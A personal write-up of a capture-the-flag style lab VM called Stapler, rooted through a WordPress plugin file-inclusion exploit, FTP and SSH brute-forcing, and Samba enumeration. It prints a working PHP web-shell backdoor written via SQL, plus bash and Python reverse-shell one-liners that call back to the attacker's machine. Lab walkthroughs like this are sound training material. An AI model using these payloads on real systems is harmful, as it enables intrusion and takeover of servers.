Today we are going to get root in stapler, a VM created by g0tmi1k. I have tried really hard on this VM, due to multiple careless mistakes (e.g. overlooked some message of scanning) and almost got lost in a bunch of people names during “dumpster diving” in the VM. But it is REALLY fun. I have tried lots of approaches to pwn it.
Method 1 – web app exploiting
Try to ssh, ftp and that strange port 666 will give you a bunch of people names, we will see them again later. Scanning port 80 turns out being useless, but soon we found out that port 12380 is another web service to have fun.
By the way, netcat to port 666 will give you a .zip file and a image after you unzip it. Also, you will get this message :
And this (real?) message after you call strings on it :
Strange enough. I don’t know how to use it in exploitation.
Anyway, let’s get back to an successful approach I have tried.
Nikto on port 12380 tells us that SSL is used and there are 3 interesting directory: /admin112233, /blogblog/ and /phpmyadmin/. We found that /blogblog/ is running wordpress. After playing with it for a while, we found this plugin :
Let’s look for some public exploits for this plugin “advanced-video”. Luckily we have found one :
It is a LFI exploits. Copy the .py file to our working directory and edit the url to https://<Stapler’s IP>:12380/blogblog , then go to /wp-content/uploads, we can see some files is included :
Naming by random number. Well, we need to check them one by one, in order to see if there are any interesting file. Finally we found that a file was containing some MYSQL config. And luckily, the root has no password! So let’s login to https://<Stapler’s IP>:12380/phpmyadmin and login with “root” and no password.
Now we can have some backdoor uploaded to Stapler here by SQL command :
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/cmd.php"
(You can type this command in the textbox appears after clicking “database” on the top of the homepage of phpmyadmin)
This will create a php file which reads an input called ‘cmd’ and executes it in Stapler’s shell, in the directory shown above. That means you can run any linux commands you want through this variable ‘cmd’. In practice, we mostly use it in this way:
https://<Stapler's IP>:12380/wp-content/uploads/cmd.php?cmd=bash -i >& /dev/tcp/<kali's IP>/443/ 0>&1
and using netcat to listen on port 443 to get a bash. But this does not work here since we have no permission to call “bash”. But luckily, we have an alternative:
https://<Stapler's IP>:12380/wp-content/uploads/cmd.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<kali's IP>",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Credit to pentestmonkey . So we have a reverse shell now:
We then found that there was an user called “peter” and a file called “sudo_as_admin_successful”. Interesting, but we have no permission to touch those things belong to him. After doing some further searching, we discovered that there was an user called JKanode doing something special:
So let’s check out what commands have been input by this user. Navigate to /home/JKanode and type cat .bash_history , we got the password of JKanode and that of peter!
So we can now ssh to Stapler with peter’s password. We can use sudo to change root’s password to anything as we wish! Done! Below is the flag:
Method 2 – FTP
Since ftp is running on Stapler, so why don’t we try to login as anonymous? We have found a file called note in the anonymous account :
So what is this note for?
Update the payload? There must be something to discover in Elly’s ftp account. So let’s see if we can brute-force into it:
Lucky for us! Elly is using a weak password !
*Remarks : -e nsr is used for checking if the users are using null password, password same as username or reverse of username as password.
After fingertip searching in Elly’s ftp account, we have found a file called passwd which seems to be a copy of /etc/passwd. Using cut -d ‘:’ -f1 > pass.txt to put all the usernames into a file named as pass.txt, we can again brute-force ssh using this name list :
Once we have access, we can use the same way as above the get the password of peter and do anything as root. Done.
Method 3 – Samba
Since samba is running on port 139, we can use enum4linux to enumerate usernames :
Again, you can try to brute-force these usernames.
Quite a long journey (comparing with the previous boot2root VM’s I have tackled – Kioptrix series). Did a lot of enumeration and searching. Tried hard, tried harder. Quite a great experience.